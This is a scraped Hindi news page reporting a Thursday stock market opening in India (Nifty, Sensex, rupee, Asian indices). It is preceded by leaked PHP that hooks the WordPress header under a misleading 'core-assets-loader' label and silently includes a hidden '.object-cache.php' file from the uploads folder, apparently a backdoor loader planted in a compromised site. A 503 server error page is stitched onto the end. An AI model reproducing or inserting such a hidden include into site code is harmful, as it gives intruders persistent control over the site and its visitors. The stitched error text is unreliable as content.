add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मार्केट ने तेजी खोई, निफ्टी 10336, सेंसेक्स 33557 पर खुला – SOCH INDIA
Menu

व्यापार
मार्केट ने तेजी खोई, निफ्टी 10336, सेंसेक्स 33557 पर खुला

nobanner

शेयर बाजार में लगातार 5 दिन से बरकरार तेजी गुरुवार को थम गई. इस कारोबारी हफ्ते के चौथे दिन निफ्टी जहां 5.95 अंकों की गिरावट के साथ खुला. वहीं, सेंसेक्स में 4.87 अंकों की गिरावट के साथ कारोबार शुरू हुआ है.

शुरुआती कारोबार में आईटी, पीएसयू बैंकों और मेटल शेयरों में उछाल देखने को मिल रहा है. पिछले 5 दिन से मार्केट में लगातार तेजी बनी हुई थी, ले‍क‍िन गुरुवार को यह तेजी थम गई.

रुपया बना हुआ है मजबूत

इस कारोबारी हफ्ते के चौथे दिन भी रुपये ने मजबूत शुरुआत की. गुरुवार को रुपया डॉलर के मुकाबले 11 पैसे मजबूत हुआ. डॉलर के मुकाबले रुपया 64.80 के स्तर पर खुला.

एश‍ियाई बाजारों में बढ़त

एशि‍याई बाजार में बढ़त का दौर बना हुआ है. जापान का बाजार निक्केई 107 अंक मजबूत होकर 22523 अंक पर कारोबार कर रहा है. वहीं, हैंग सेंग में 121 अंक की मजबूती देखने को मिल रही है. हैंगसेंग 30125 अंक पर कारोबार कर रहा है.

बुधवार को बनी रही तेजी

मेटल और सीमेंट शेयरों में आई तेजी से बुधवार को शेयर बाजार बढ़त के साथ बंद हुए. इस कारोबारी हफ्ते के तीसरे दिन निफ्टी 15.40 अंकों की बढ़त के साथ बंद हुआ. वहीं, सेंसेक्स 83.20 अंकों की बढ़त के साथ बंद हुआ.

दिवालिया कानून में संशोधन दिवालिया कानून में संशोधन ने पीएसयू बैंकों के इंडेक्स को तेजी देने में मदद की. पीएसयू बैंकों के अलावा एफएमसीजी, रियल्टी और ऑटो इंडेक्स में भी बुधवार को तेजी देखने को मिली.

वैश्‍व‍िक बाजार से मिले मजबूत संकेतों के चलते घरेलू शेयर बाजार की बुधवार को शुरुआत भी तेज हुई. इस कारोबारी हफ्ते के तीसरे दिन सेंसेक्स जहां 91 अंक बढ़कर 33569 के स्तर पर खुला. वहीं, निफ्टी 24 अंक की तेजी के साथ 10351 के स्तर पर खुला.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.